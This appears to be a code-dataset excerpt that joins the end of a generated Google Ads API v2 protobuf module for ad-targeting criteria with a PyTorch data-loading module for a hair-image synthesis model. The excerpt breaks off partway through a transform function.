Attributes:
min_days:
Low end of the number of days prior to the stay.
max_days:
High end of the number of days prior to the stay.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.HotelAdvanceBookingWindowInfo)
))
_sym_db.RegisterMessage(HotelAdvanceBookingWindowInfo)
HotelLengthOfStayInfo = _reflection.GeneratedProtocolMessageType('HotelLengthOfStayInfo', (_message.Message,), dict(
DESCRIPTOR = _HOTELLENGTHOFSTAYINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Criterion for length of hotel stay in nights.
Attributes:
min_nights:
Low end of the number of nights in the stay.
max_nights:
High end of the number of nights in the stay.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.HotelLengthOfStayInfo)
))
_sym_db.RegisterMessage(HotelLengthOfStayInfo)
HotelCheckInDayInfo = _reflection.GeneratedProtocolMessageType('HotelCheckInDayInfo', (_message.Message,), dict(
DESCRIPTOR = _HOTELCHECKINDAYINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Criterion for day of the week the booking is for.
Attributes:
day_of_week:
The day of the week.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.HotelCheckInDayInfo)
))
_sym_db.RegisterMessage(HotelCheckInDayInfo)
InteractionTypeInfo = _reflection.GeneratedProtocolMessageType('InteractionTypeInfo', (_message.Message,), dict(
DESCRIPTOR = _INTERACTIONTYPEINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Criterion for Interaction Type.
Attributes:
type:
The interaction type.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.InteractionTypeInfo)
))
_sym_db.RegisterMessage(InteractionTypeInfo)
AdScheduleInfo = _reflection.GeneratedProtocolMessageType('AdScheduleInfo', (_message.Message,), dict(
DESCRIPTOR = _ADSCHEDULEINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Represents an AdSchedule criterion.
AdSchedule is specified as the day of the week and a time interval
within which ads will be shown.
No more than six AdSchedules can be added for the same day.
Attributes:
start_minute:
Minutes after the start hour at which this schedule starts.
This field is required for CREATE operations and is prohibited
on UPDATE operations.
end_minute:
Minutes after the end hour at which this schedule ends. The
schedule is exclusive of the end minute. This field is
required for CREATE operations and is prohibited on UPDATE
operations.
start_hour:
Starting hour in 24 hour time. This field must be between 0
and 23, inclusive. This field is required for CREATE
operations and is prohibited on UPDATE operations.
end_hour:
Ending hour in 24 hour time; 24 signifies end of the day. This
field must be between 0 and 24, inclusive. This field is
required for CREATE operations and is prohibited on UPDATE
operations.
day_of_week:
Day of the week the schedule applies to. This field is
required for CREATE operations and is prohibited on UPDATE
operations.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.AdScheduleInfo)
))
_sym_db.RegisterMessage(AdScheduleInfo)
AgeRangeInfo = _reflection.GeneratedProtocolMessageType('AgeRangeInfo', (_message.Message,), dict(
DESCRIPTOR = _AGERANGEINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """An age range criterion.
Attributes:
type:
Type of the age range.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.AgeRangeInfo)
))
_sym_db.RegisterMessage(AgeRangeInfo)
GenderInfo = _reflection.GeneratedProtocolMessageType('GenderInfo', (_message.Message,), dict(
DESCRIPTOR = _GENDERINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A gender criterion.
Attributes:
type:
Type of the gender.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.GenderInfo)
))
_sym_db.RegisterMessage(GenderInfo)
IncomeRangeInfo = _reflection.GeneratedProtocolMessageType('IncomeRangeInfo', (_message.Message,), dict(
DESCRIPTOR = _INCOMERANGEINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """An income range criterion.
Attributes:
type:
Type of the income range.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.IncomeRangeInfo)
))
_sym_db.RegisterMessage(IncomeRangeInfo)
ParentalStatusInfo = _reflection.GeneratedProtocolMessageType('ParentalStatusInfo', (_message.Message,), dict(
DESCRIPTOR = _PARENTALSTATUSINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A parental status criterion.
Attributes:
type:
Type of the parental status.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ParentalStatusInfo)
))
_sym_db.RegisterMessage(ParentalStatusInfo)
YouTubeVideoInfo = _reflection.GeneratedProtocolMessageType('YouTubeVideoInfo', (_message.Message,), dict(
DESCRIPTOR = _YOUTUBEVIDEOINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A YouTube Video criterion.
Attributes:
video_id:
YouTube video id as it appears on the YouTube watch page.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.YouTubeVideoInfo)
))
_sym_db.RegisterMessage(YouTubeVideoInfo)
YouTubeChannelInfo = _reflection.GeneratedProtocolMessageType('YouTubeChannelInfo', (_message.Message,), dict(
DESCRIPTOR = _YOUTUBECHANNELINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A YouTube Channel criterion.
Attributes:
channel_id:
The YouTube uploader channel id or the channel code of a
YouTube channel.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.YouTubeChannelInfo)
))
_sym_db.RegisterMessage(YouTubeChannelInfo)
UserListInfo = _reflection.GeneratedProtocolMessageType('UserListInfo', (_message.Message,), dict(
DESCRIPTOR = _USERLISTINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A User List criterion. Represents a user list that is defined by the
advertiser to be targeted.
Attributes:
user_list:
The User List resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.UserListInfo)
))
_sym_db.RegisterMessage(UserListInfo)
ProximityInfo = _reflection.GeneratedProtocolMessageType('ProximityInfo', (_message.Message,), dict(
DESCRIPTOR = _PROXIMITYINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A Proximity criterion. The geo point and radius determine what
geographical area is included. The address is a description of the geo
point that does not affect ad serving.
There are two ways to create a proximity. First, by setting an address
and radius. The geo point will be automatically computed. Second, by
setting a geo point and radius. The address is an optional label that
won't be validated.
Attributes:
geo_point:
Latitude and longitude.
radius:
The radius of the proximity.
radius_units:
The unit of measurement of the radius. Default is KILOMETERS.
address:
Full address.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ProximityInfo)
))
_sym_db.RegisterMessage(ProximityInfo)
GeoPointInfo = _reflection.GeneratedProtocolMessageType('GeoPointInfo', (_message.Message,), dict(
DESCRIPTOR = _GEOPOINTINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Geo point for proximity criterion.
Attributes:
longitude_in_micro_degrees:
Micro degrees for the longitude.
latitude_in_micro_degrees:
Micro degrees for the latitude.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.GeoPointInfo)
))
_sym_db.RegisterMessage(GeoPointInfo)
AddressInfo = _reflection.GeneratedProtocolMessageType('AddressInfo', (_message.Message,), dict(
DESCRIPTOR = _ADDRESSINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Address for proximity criterion.
Attributes:
postal_code:
Postal code.
province_code:
Province or state code.
country_code:
Country code.
province_name:
Province or state name.
street_address:
Street address line 1.
street_address2:
Street address line 2. This field is write-only. It is only
used for calculating the longitude and latitude of an address
when geo\_point is empty.
city_name:
Name of the city.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.AddressInfo)
))
_sym_db.RegisterMessage(AddressInfo)
TopicInfo = _reflection.GeneratedProtocolMessageType('TopicInfo', (_message.Message,), dict(
DESCRIPTOR = _TOPICINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A topic criterion. Use topics to target or exclude placements in the
Google Display Network based on the category into which the placement
falls (for example, "Pets & Animals/Pets/Dogs").
Attributes:
topic_constant:
The Topic Constant resource name.
path:
The category to target or exclude. Each subsequent element in
the array describes a more specific sub-category. For example,
"Pets & Animals", "Pets", "Dogs" represents the "Pets &
Animals/Pets/Dogs" category.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.TopicInfo)
))
_sym_db.RegisterMessage(TopicInfo)
LanguageInfo = _reflection.GeneratedProtocolMessageType('LanguageInfo', (_message.Message,), dict(
DESCRIPTOR = _LANGUAGEINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A language criterion.
Attributes:
language_constant:
The language constant resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.LanguageInfo)
))
_sym_db.RegisterMessage(LanguageInfo)
IpBlockInfo = _reflection.GeneratedProtocolMessageType('IpBlockInfo', (_message.Message,), dict(
DESCRIPTOR = _IPBLOCKINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """An IpBlock criterion used for IP exclusions. We allow: - IPv4 and IPv6
addresses - individual addresses (192.168.0.1) - masks for individual
addresses (192.168.0.1/32) - masks for Class C networks (192.168.0.1/24)
Attributes:
ip_address:
The IP address of this IP block.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.IpBlockInfo)
))
_sym_db.RegisterMessage(IpBlockInfo)
ContentLabelInfo = _reflection.GeneratedProtocolMessageType('ContentLabelInfo', (_message.Message,), dict(
DESCRIPTOR = _CONTENTLABELINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Content Label for category exclusion.
Attributes:
type:
Content label type, required for CREATE operations.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ContentLabelInfo)
))
_sym_db.RegisterMessage(ContentLabelInfo)
CarrierInfo = _reflection.GeneratedProtocolMessageType('CarrierInfo', (_message.Message,), dict(
DESCRIPTOR = _CARRIERINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Represents a Carrier Criterion.
Attributes:
carrier_constant:
The Carrier constant resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.CarrierInfo)
))
_sym_db.RegisterMessage(CarrierInfo)
UserInterestInfo = _reflection.GeneratedProtocolMessageType('UserInterestInfo', (_message.Message,), dict(
DESCRIPTOR = _USERINTERESTINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Represents a particular interest-based topic to be targeted.
Attributes:
user_interest_category:
The UserInterest resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.UserInterestInfo)
))
_sym_db.RegisterMessage(UserInterestInfo)
WebpageInfo = _reflection.GeneratedProtocolMessageType('WebpageInfo', (_message.Message,), dict(
DESCRIPTOR = _WEBPAGEINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Represents a criterion for targeting webpages of an advertiser's
website.
Attributes:
criterion_name:
The name of the criterion that is defined by this parameter.
The name value will be used for identifying, sorting and
filtering criteria with this type of parameters. This field
is required for CREATE operations and is prohibited on UPDATE
operations.
conditions:
Conditions, or logical expressions, for webpage targeting. The
list of webpage targeting conditions are and-ed together when
evaluated for targeting. This field is required for CREATE
operations and is prohibited on UPDATE operations.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.WebpageInfo)
))
_sym_db.RegisterMessage(WebpageInfo)
WebpageConditionInfo = _reflection.GeneratedProtocolMessageType('WebpageConditionInfo', (_message.Message,), dict(
DESCRIPTOR = _WEBPAGECONDITIONINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Logical expression for targeting webpages of an advertiser's website.
Attributes:
operand:
Operand of webpage targeting condition.
operator:
Operator of webpage targeting condition.
argument:
Argument of webpage targeting condition.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.WebpageConditionInfo)
))
_sym_db.RegisterMessage(WebpageConditionInfo)
OperatingSystemVersionInfo = _reflection.GeneratedProtocolMessageType('OperatingSystemVersionInfo', (_message.Message,), dict(
DESCRIPTOR = _OPERATINGSYSTEMVERSIONINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Represents an operating system version to be targeted.
Attributes:
operating_system_version_constant:
The operating system version constant resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.OperatingSystemVersionInfo)
))
_sym_db.RegisterMessage(OperatingSystemVersionInfo)
AppPaymentModelInfo = _reflection.GeneratedProtocolMessageType('AppPaymentModelInfo', (_message.Message,), dict(
DESCRIPTOR = _APPPAYMENTMODELINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """An app payment model criterion.
Attributes:
type:
Type of the app payment model.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.AppPaymentModelInfo)
))
_sym_db.RegisterMessage(AppPaymentModelInfo)
MobileDeviceInfo = _reflection.GeneratedProtocolMessageType('MobileDeviceInfo', (_message.Message,), dict(
DESCRIPTOR = _MOBILEDEVICEINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A mobile device criterion.
Attributes:
mobile_device_constant:
The mobile device constant resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.MobileDeviceInfo)
))
_sym_db.RegisterMessage(MobileDeviceInfo)
CustomAffinityInfo = _reflection.GeneratedProtocolMessageType('CustomAffinityInfo', (_message.Message,), dict(
DESCRIPTOR = _CUSTOMAFFINITYINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A custom affinity criterion. A criterion of this type is only
targetable.
Attributes:
custom_affinity:
The CustomInterest resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.CustomAffinityInfo)
))
_sym_db.RegisterMessage(CustomAffinityInfo)
CustomIntentInfo = _reflection.GeneratedProtocolMessageType('CustomIntentInfo', (_message.Message,), dict(
DESCRIPTOR = _CUSTOMINTENTINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A custom intent criterion. A criterion of this type is only targetable.
Attributes:
custom_intent:
The CustomInterest resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.CustomIntentInfo)
))
_sym_db.RegisterMessage(CustomIntentInfo)
LocationGroupInfo = _reflection.GeneratedProtocolMessageType('LocationGroupInfo', (_message.Message,), dict(
DESCRIPTOR = _LOCATIONGROUPINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A radius around a list of locations specified via a feed.
Attributes:
feed:
Feed specifying locations for targeting. This is required and
must be set in CREATE operations.
geo_target_constants:
Geo target constant(s) restricting the scope of the geographic
area within the feed. Currently only one geo target constant
is allowed.
radius:
Distance in units specifying the radius around targeted
locations. This is required and must be set in CREATE
operations.
radius_units:
Unit of the radius, miles and meters supported currently. This
is required and must be set in CREATE operations.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.LocationGroupInfo)
))
_sym_db.RegisterMessage(LocationGroupInfo)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
py | b41065976e261e9ac601e297e370d379f7149b34 | """
Copyright (C) University of Science and Technology of China.
Licensed under the MIT License.
"""
import torch.utils.data as data
from PIL import Image
import torchvision.transforms as transforms
import numpy as np
import random
import torch
import cv2
import matplotlib.pyplot as plt
import torch.nn.functional as F
class BaseDataset(data.Dataset):
def __init__(self):
super(BaseDataset, self).__init__()
@staticmethod
def modify_commandline_options(parser, is_train):
return parser
def initialize(self, opt):
pass
def pad_zeros(input, pad_th):
'''
:param input: type: PIL Image
:param pad_th: int
:return:
'''
img = np.array(input)
size = img.shape
if len(size) == 2:
H, W = size[0], size[1]
pad_img = np.zeros((H + pad_th, W + pad_th))
pad_img[int(pad_th / 2):int(pad_th / 2) + H, int(pad_th / 2):int(pad_th / 2) + W] = img
else:
H, W, C = size[0], size[1], size[2]
pad_img = np.zeros((H+pad_th, W+pad_th, C))
pad_img[int(pad_th/2):int(pad_th/2)+H, int(pad_th/2):int(pad_th/2)+W, :] = img
pad_img = np.uint8(pad_img)
# plt.imshow(pad_img)
# plt.show()
return Image.fromarray(pad_img)
def single_inference_dataLoad(opt):
base_dir = opt.data_dir
#subset = opt.subset
print('opt:', opt.inference_ref_name, opt.inference_tag_name, opt.inference_orient_name)
label_ref_dir = base_dir + '/' + 'labels/' + opt.inference_ref_name + '.png'
label_tag_dir = base_dir + '/' + 'labels/' + opt.inference_tag_name + '.png'
orient_tag_dir = base_dir + '/' + 'orients/' + opt.inference_tag_name + '_orient_dense.png'
orient_ref_dir = base_dir + '/' + 'orients/' + opt.inference_orient_name + '_orient_dense.png'
orient_mask_dir = base_dir + '/' + 'labels/' + opt.inference_orient_name + '.png'
image_ref_dir = base_dir + '/' + 'images/' + opt.inference_ref_name + '.jpg'
image_tag_dir = base_dir + '/' + 'images/' + opt.inference_tag_name + '.jpg'
label_ref = Image.open(label_ref_dir)
label_tag = Image.open(label_tag_dir)
orient_mask = Image.open(orient_mask_dir)
orient_tag = Image.open(orient_tag_dir)
orient_ref = Image.open(orient_ref_dir)
image_ref = Image.open(image_ref_dir)
image_tag = Image.open(image_tag_dir)
# add zeros
if opt.add_zeros:
label_ref = pad_zeros(label_ref, opt.add_th)
label_tag = pad_zeros(label_tag, opt.add_th)
orient_mask = pad_zeros(orient_mask, opt.add_th)
orient_tag = pad_zeros(orient_tag, opt.add_th)
orient_ref = pad_zeros(orient_ref, opt.add_th)
image_ref = pad_zeros(image_ref, opt.add_th)
image_tag = pad_zeros(image_tag, opt.add_th)
# orient, label = RandomErasure(orient, label)
# label process
params = get_params(opt, label_ref.size)
transform_label = get_transform(opt, params, method=Image.NEAREST, normalize=False)
label_ref_tensor = transform_label(label_ref) * 255.0
label_ref_tensor[label_ref_tensor == 255] = opt.label_nc
label_ref_tensor = torch.unsqueeze(label_ref_tensor, 0)
if opt.expand_tag_mask:
label_tag_array = np.array(label_tag)
di_k = 25
dilate_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (di_k, di_k))
label_tag_array = cv2.dilate(label_tag_array, dilate_kernel)
label_tag = Image.fromarray(np.uint8(label_tag_array)).convert('L')
label_tag_tensor = transform_label(label_tag) * 255.0
label_tag_tensor[label_tag_tensor == 255] = opt.label_nc
label_tag_tensor = torch.unsqueeze(label_tag_tensor, 0)
orient_mask_tensor = transform_label(orient_mask) * 255.0
orient_mask_tensor[orient_mask_tensor == 255] = opt.label_nc
orient_mask_tensor = torch.unsqueeze(orient_mask_tensor, 0)
# if opt.expand_tag_mask:
# k = opt.expand_value
# p = int(k / 2)
# orient_mask_tensor = F.max_pool2d(orient_mask_tensor, kernel_size=k, stride=1, padding=p)
# rgb orientation maps
if opt.use_ig and not opt.no_orientation:
orient_tag_rgb = trans_orient_to_rgb(np.array(orient_ref), np.array(label_tag), np.array(orient_mask))
orient_rgb_tensor = transform_label(orient_tag_rgb)
orient_rgb_tensor = torch.unsqueeze(orient_rgb_tensor, 0)
orient_rgb_tensor = orient_rgb_tensor * label_tag_tensor
else:
orient_rgb_tensor = torch.tensor(0)
# hole mask
if opt.use_ig:
if opt.inference_orient_name == opt.inference_tag_name:
hole = np.array(label_tag)
hole = generate_hole(hole, np.array(orient_mask))
hole_tensor = transform_label(hole) * 255.0
hole_tensor = torch.unsqueeze(hole_tensor, 0)
else:
hole_tensor = label_tag_tensor - orient_mask_tensor * label_tag_tensor
else:
hole_tensor = torch.tensor(0)
# generate noise
noise = generate_noise(opt.crop_size, opt.crop_size)
noise_tensor = torch.tensor(noise).permute(2, 0, 1)
noise_tensor = torch.unsqueeze(noise_tensor, 0)
image_ref = image_ref.convert('RGB')
if opt.color_jitter:
transform_image = get_transform(opt, params, color=True)
else:
transform_image = get_transform(opt, params)
image_ref_tensor = transform_image(image_ref)
image_ref_tensor = torch.unsqueeze(image_ref_tensor, 0)
image_tag = image_tag.convert('RGB')
transform_image = get_transform(opt, params)
image_tag_tensor = transform_image(image_tag)
image_tag_tensor = torch.unsqueeze(image_tag_tensor, 0)
orient_tensor = transform_label(orient_tag) * 255
orient_tensor = torch.unsqueeze(orient_tensor, 0)
data = {'label_ref': label_ref_tensor,
'label_tag': label_tag_tensor,
'instance': torch.tensor(0),
'image_ref': image_ref_tensor,
'image_tag': image_tag_tensor,
'path': image_tag_dir,
'orient': orient_tensor,
'hole': hole_tensor,
'orient_rgb': orient_rgb_tensor,
'noise': noise_tensor
}
return data
def demo_inference_dataLoad(opt, ref_label_dir, tag_label, mask_orient, ref_orient, ref_image, tag_image, orient_stroke=None, mask_stroke=None, mask_hole=None):
'''
:param opt:
:param ref_label_dir:
:param tag_label:
:param mask_orient:
:param ref_orient:
:param ref_image:
:param tag_image:
:param orient_stroke: type: np.array, shape: 512*512*3, range: [0, 255]
:param mask_stroke: type: np.array, range: {0, 1}, shape: 512*512
:param mask_hole: type: np.array, range: {0, 1}, shape: 512*512
:return:
'''
label_ref = Image.open(ref_label_dir)
label_tag = Image.fromarray(np.uint8(tag_label))
orient_mask = Image.fromarray(np.uint8(mask_orient))
orient_ref = Image.fromarray(np.uint8(ref_orient))
image_ref = ref_image
image_tag = tag_image
# orient, label = RandomErasure(orient, label)
# label process
params = get_params(opt, label_ref.size)
transform_label = get_transform(opt, params, method=Image.NEAREST, normalize=False)
label_ref_tensor = transform_label(label_ref) * 255.0
label_ref_tensor[label_ref_tensor == 255] = opt.label_nc
label_ref_tensor = torch.unsqueeze(label_ref_tensor, 0)
if opt.expand_tag_mask:
label_tag_array = np.array(label_tag)
di_k = 25
dilate_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (di_k, di_k))
label_tag_array = cv2.dilate(label_tag_array, dilate_kernel)
label_tag = Image.fromarray(np.uint8(label_tag_array)).convert('L')
label_tag_tensor = transform_label(label_tag) * 255.0
label_tag_tensor[label_tag_tensor == 255] = opt.label_nc
label_tag_tensor = torch.unsqueeze(label_tag_tensor, 0)
orient_mask_tensor = transform_label(orient_mask) * 255.0
orient_mask_tensor[orient_mask_tensor == 255] = opt.label_nc
orient_mask_tensor = torch.unsqueeze(orient_mask_tensor, 0)
# rgb orientation maps
orient_tag_rgb = trans_orient_to_rgb(np.array(orient_ref), np.array(label_tag), np.array(orient_mask))
orient_rgb_tensor = transform_label(orient_tag_rgb)
orient_rgb_tensor = torch.unsqueeze(orient_rgb_tensor, 0)
orient_rgb_tensor = orient_rgb_tensor * label_tag_tensor
orient_rgb_mask = orient_mask_tensor * label_tag_tensor
# hole mask
if mask_hole is None:
hole_tensor = label_tag_tensor - orient_mask_tensor * label_tag_tensor
else:
mask_hole_img = Image.fromarray(np.uint8(mask_hole))
hole_tensor = transform_label(mask_hole_img) * 255.0
hole_tensor = torch.unsqueeze(hole_tensor, 0) * label_tag_tensor
# orient_stroke
if orient_stroke is not None:
orient_stroke_img = Image.fromarray(np.uint8(orient_stroke))
# orient_stroke_img.save('./inference_samples/orient_stroke.png')
orient_stroke_tensor = transform_label(orient_stroke_img)
orient_stroke_tensor = torch.unsqueeze(orient_stroke_tensor, 0)
orient_stroke_tensor = orient_stroke_tensor * label_tag_tensor
else:
orient_stroke_tensor = torch.tensor(0)
# mask_stroke
if mask_stroke is not None:
mask_stroke_img = Image.fromarray(np.uint8(mask_stroke))
mask_stroke_tensor = transform_label(mask_stroke_img) * 255.0
mask_stroke_tensor = torch.unsqueeze(mask_stroke_tensor, 0) * label_tag_tensor
else:
mask_stroke_tensor = torch.tensor(0)
# generate noise
noise = generate_noise(opt.crop_size, opt.crop_size)
noise_tensor = torch.tensor(noise).permute(2, 0, 1)
noise_tensor = torch.unsqueeze(noise_tensor, 0)
image_ref = image_ref.convert('RGB')
if opt.color_jitter:
transform_image = get_transform(opt, params, color=True)
else:
transform_image = get_transform(opt, params)
image_ref_tensor = transform_image(image_ref)
image_ref_tensor = torch.unsqueeze(image_ref_tensor, 0)
image_tag = image_tag.convert('RGB')
transform_image = get_transform(opt, params)
image_tag_tensor = transform_image(image_tag)
image_tag_tensor = torch.unsqueeze(image_tag_tensor, 0)
#
orient_tensor = transform_label(orient_ref) * 255
orient_tensor = torch.unsqueeze(orient_tensor, 0)
data = {'label_ref': label_ref_tensor,
'label_tag': label_tag_tensor,
'instance': torch.tensor(0),
'image_ref': image_ref_tensor,
'image_tag': image_tag_tensor,
'path': None,
'orient': orient_tensor,
'hole': hole_tensor,
'orient_rgb': orient_rgb_tensor,
'orient_rgb_mask': orient_rgb_mask,
'noise': noise_tensor,
'orient_stroke': orient_stroke_tensor,
'mask_stroke': mask_stroke_tensor
}
return data
def show_training_data(data):
noise = data['noise']
orient_rgb = data['orient_rgb']
hole = data['hole']
image_ref = data['image_ref']
image_tag = data['image_tag']
# trans , noise and orient_rgb is range from 0 to 1
noise = noise.permute(1,2,0).numpy()
orient_rgb = orient_rgb.permute(1,2,0).numpy()
hole = hole.permute(1,2,0).numpy()
image_ref = (image_ref.permute(1,2,0).numpy() + 1) / 2
image_tag = (image_tag.permute(1, 2, 0).numpy() + 1) / 2
orient_noise = orient_rgb * (1 - hole) + noise * hole
# plt
plt.subplot(2,2,1)
plt.imshow(orient_rgb)
plt.subplot(2,2,2)
plt.imshow(orient_noise)
plt.subplot(2,2,3)
plt.imshow(image_ref)
plt.subplot(2,2,4)
plt.imshow(image_tag)
plt.show()
def RandomErasure(orient, label):
import math
orient_array = np.array(orient)
H, W = orient_array.shape
if abs(orient_array).max() == 0:
return orient, label
else:
coord = np.where(orient_array != 0)
nums = len(coord[0])
th = random.uniform(0.3, 1.5)
crop_nums = int(th * nums)
rr = int(crop_nums / math.pi)
center_idx = random.randint(0, nums-1)
center_h = coord[0][center_idx]
center_w = coord[1][center_idx]
tmp_h = np.array(range(H))
tmp_h = tmp_h.repeat(W).reshape(H, W)
tmp_w = np.array(range(W))
tmp_w = np.tile(tmp_w, H).reshape(H, W)
mask = ((tmp_h - center_h) ** 2 + (tmp_w - center_w) ** 2) < rr
mask = mask.astype(np.float)
orient_array = orient_array * (1-mask)
orient_array = Image.fromarray(np.uint8(orient_array))
label_array = np.array(label) * (1-mask)
label_array = Image.fromarray(np.uint8(label_array))
return orient_array, label_array
def generate_hole(mask, orient_mask):
import math
H, W = orient_mask.shape
if abs(orient_mask).max() == 0:
return Image.fromarray(np.uint8(orient_mask)).convert('L')
else:
coord = np.where(orient_mask != 0)
nums = len(coord[0])
th = random.uniform(0.5, 1.2)
crop_nums = int(th * nums)
rr = int(crop_nums / math.pi)
center_idx = random.randint(0, nums-1)
center_h = coord[0][center_idx]
center_w = coord[1][center_idx]
tmp_h = np.array(range(H))
tmp_h = tmp_h.repeat(W).reshape(H, W)
tmp_w = np.array(range(W))
tmp_w = np.tile(tmp_w, H).reshape(H, W)
tmp_mask = ((tmp_h - center_h) ** 2 + (tmp_w - center_w) ** 2) < rr
tmp_mask = tmp_mask.astype(np.float)
hole_mask = orient_mask * tmp_mask + (mask - orient_mask)
hole = Image.fromarray(np.uint8(hole_mask)).convert('L')
return hole
def trans_orient_to_rgb(orient, label, orient_label=None):
import math
# orient is the dense orient map which ranges from 0 to 255, orient_label is the mask which matches the orient
# if orient_label is None, that means label matches the orient
orient_mask = orient / 255.0 * math.pi
H, W = orient_mask.shape
orient_rgb = np.zeros((H, W, 3))
orient_rgb[..., 1] = (np.sin(2 * orient_mask)+1)/2
orient_rgb[..., 0] = (np.cos(2 * orient_mask)+1)/2
orient_rgb[...,2] = 0.5
if orient_label is None:
orient_rgb *= label[...,np.newaxis]
orient_rgb = orient_rgb * 255.0
orient_rgb = Image.fromarray(np.uint8(orient_rgb)).convert('RGB')
# orient_rgb.save('./inference_samples/orient_before_trans.png')
return orient_rgb
else:
orient_rgb *= orient_label[..., np.newaxis]
orient_rgb = orient_rgb * 255.0
orient_rgb = Image.fromarray(np.uint8(orient_rgb)).convert('RGB')
# orient_rgb.save('./inference_samples/orient_before_trans.png')
return orient_rgb
def generate_noise(width, height):
weight = 1.0
weightSum = 0.0
noise = np.zeros((height, width, 3)).astype(np.float32)
while width >= 8 and height >= 8:
noise += cv2.resize(np.random.normal(loc = 0.5, scale = 0.25, size = (int(height), int(width), 3)), dsize = (noise.shape[0], noise.shape[1])) * weight
weightSum += weight
width //= 2
height //= 2
return noise / weightSum
def get_params(opt, size):
w, h = size
new_h = h
new_w = w
if opt.preprocess_mode == 'resize_and_crop':
new_h = new_w = opt.load_size
elif opt.preprocess_mode == 'scale_width_and_crop':
new_w = opt.load_size
new_h = opt.load_size * h // w
elif opt.preprocess_mode == 'scale_shortside_and_crop':
ss, ls = min(w, h), max(w, h) # shortside and longside
width_is_shorter = w == ss
ls = int(opt.load_size * ls / ss)
new_w, new_h = (ss, ls) if width_is_shorter else (ls, ss)
x = random.randint(0, np.maximum(0, new_w - opt.crop_size))
y = random.randint(0, np.maximum(0, new_h - opt.crop_size))
flip = random.random() > 0.5
return {'crop_pos': (x, y), 'flip': flip}
def get_transform(opt, params, method=Image.BICUBIC, normalize=True, toTensor=True, color=False):
transform_list = []
if 'resize' in opt.preprocess_mode:
osize = [opt.load_size, opt.load_size]
transform_list.append(transforms.Resize(osize, interpolation=method))
elif 'scale_width' in opt.preprocess_mode:
transform_list.append(transforms.Lambda(lambda img: __scale_width(img, opt.load_size, method)))
elif 'scale_shortside' in opt.preprocess_mode:
